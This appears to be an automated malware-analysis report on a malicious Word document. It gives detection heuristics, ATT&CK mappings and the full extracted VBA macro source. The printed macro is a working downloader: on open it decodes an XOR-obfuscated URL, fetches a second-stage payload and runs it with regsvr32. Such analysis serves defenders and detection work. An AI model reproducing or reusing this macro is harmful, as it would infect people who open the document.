Verdict: MALICIOUS
Risk Score: 150

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious OOXML (Word) document containing VBA macros. The `autoopen` subroutine calls the function `id` on the string constant `AL`; `id` splits the constant on spaces and XORs each number with 1 before converting it to a character, which deobfuscates the download URL (the first decoded bytes spell `http://`). The result is passed to `frm.download`, a thin wrapper around the `urlmon` API `URLDownloadToFile`, to fetch a second-stage payload into `mp.pdf`. Finally, a `WshShell` object executes a command built from the constants `K5` (`"reg"`) and `D1` (`"svr"`) followed by the literal `"32 mp.pdf"`, which is most likely how the downloaded payload is run.
Heuristics (5)
- ClamAV: Doc.Downloader.GreenBox5-9139204-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0.
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings). Document contains a VBA project; VBA macros are present.
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched line in script: `#If VBA7 And Win64 Then Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal C As LongPtr, ByVal BG As String, ByVal cw As String, ByVal oK As LongPtr, ByVal hy As LongPtr) As Long #Else`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `End Function Sub autoopen() sx = id(AL)`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (referenced by macro)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
  - http://schemas.microsoft.com/office/word/2018/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3790 bytes | 418159da755dfa7eaf94c20787b4c1727c5ace7fbf11829a7b57bf5f35a657f9 |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "T0"
Function id(GC)
' Rom glade fervor tine bleaching
' Tennis
' Favor robot
' Mutual append laughable
' Expand exactness eke
' Vestry apollo unravel python
AQ = Split(GC, " ")
For jH = 0 To UBound(AQ)
TX = TX & Chr(AQ(jH) Xor 1)
Next jH
id = TX
End Function
Sub autoopen()
sx = id(AL)
' Unbalanced edges wiring rochester
' Malay francis unaltered
' Shanty
' Ia sys fetus vitiated
' Median
' Amenable contributors
frm.download sx, "mp.pdf"
' Studying charger
' Direct
' Burly owned
' Solaris abase takes
' Hobbies hilarity suzerainty accomplishes
' Philanthropy emma
' Mia
' Eight larger
' Ll
' Projection antiquated antigua merry fundamental
' Preceding
' Atom handheld venereal rocket mausoleum differ
' Term manliness
' Bare tawdry pretentious fears egress
Dim jZ As New WshShell
Call jZ.exec(K5 & D1 & "32 mp.pdf")
End Sub
Attribute VB_Name = "T01"
Sub Y()
' Description episode curt
' Instantaneous salvador guard separately corn destroy
' Connective peoples
' Chamois
' Incongruity moodily pediatric
' Institute partly squall operator cocks strand
' Sid stat
' Vehicles loophole wreckage cricket
' Dispensation horizontal befriend bookseller petite
' Deduction workings
' Spiritualism andale
' Youse lease
' Gander merry biodiversity
' Continues
' Infrastructure clipped delineate
' Inclusive abasement criteria upset dawns
' Rail overhung clink
' Voted seventy-seven
' Hawaii
' Silhouette tibet credits
' Uncut nurture
' Wagner stalking cleveland
' Promotional smoker
' Thrive guts vellum
' Phaeton told allowed cannibal
' Idiom four
' Triangle temporarily florist equinoctial tonic moodily inkling
' Print scalp harpsichord submitted
' Quote candle wounding perennial
' Assess bedford pet radio
' Papua blog hittite nightmare reproduce
' Uses purchase
' Distributor
' Loss roped
' Waver freemen interactions television
' Companion scramble sumatra disability
' Feat engrave xenophon sawdust
End Sub
Attribute VB_Name = "FR"
Public Const K5 As String = "reg"
Public Const D1 As String = "svr"
Public Const AL As String = "105 117 117 113 59 46 46 56 115 120 105 108 114 106 47 98 110 108 46 53 96 101 115 46 109 110 117 119 47 113 105 113 62 109 60 123 116 102 48 47 98 96 99"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal C As LongPtr, ByVal BG As String, ByVal cw As String, ByVal oK As LongPtr, ByVal hy As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal C As Long, ByVal BG As String, ByVal cw As String, ByVal oK As Long, ByVal hy As Long) As Long
#End If
Function jI()
' Hearths
' Simulation spelling quince ryan crank terrorist pshaw situate
' Consisting label subsides baritone tuition
' Aol saline
' Translucent with
' Lens invalid
' Stud insidiously his engulf crm waxing undress
' Comprehensible minneapolis tolerance catholic
' Focus nevada
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{71215BEA-90A8-46AE-9C2F-005B83AC2D66}{38FDBF41-C860-4295-9D4E-74290AA4FD26}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes | 38f82814c8997267489b3f2f97bb6242143cf36b6aa22d44af3e550d37656c86 |